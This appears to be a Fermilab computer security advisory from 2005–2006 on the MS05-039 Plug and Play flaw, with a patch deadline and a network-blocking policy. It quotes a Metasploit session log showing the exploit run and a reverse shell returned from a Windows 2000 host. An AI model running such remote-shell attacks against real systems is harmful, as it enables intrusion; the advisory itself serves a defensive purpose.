|
Microsoft released a patch for MS05-039 (899588) Plug and Play (http://www.microsoft.com/technet/security/bulletin/MS05-039.mspx). There is a working exploit for Windows 2000 systems, with a universal exploit for Windows XP SP1/SP2 and 2003 Server. This exploit permits an attacker to get an interactive shell: % ms05_039_pnp(win32_reverse) > exploit [*] Starting Reverse Handler. [*] Detected a Windows 2000 target (XXXXXX.fnal.gov) [*] Sending the final DCE fragment [*] Got connection from 131.225.x.x:1234 <-> 131.225.y.y:2345 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> Because this vulnerability permits very easy remote exploitation, and allows for a Local System shell, this vulnerability has been declared Critical by Fermilab Computer Security. Since there is a working exploit, and has been incorporated into at least one worm (Zotob.A) and a Bot (W32/Sdbot.worm), Windows systems must have this patch applied by August 24, 2005. At that time, unpatched systems will be blocked from network access until remediated. Be aware that if this exploit is distributed in an active mas spreading worm , this date may be moved up a bit. |
|
For assistance contact helpdesk@fnal.gov.
Information compiled and maintained by Computer Security Team ; last modified by TR on July 13, 2006. (Address comments about page to the Computer Security Team.) |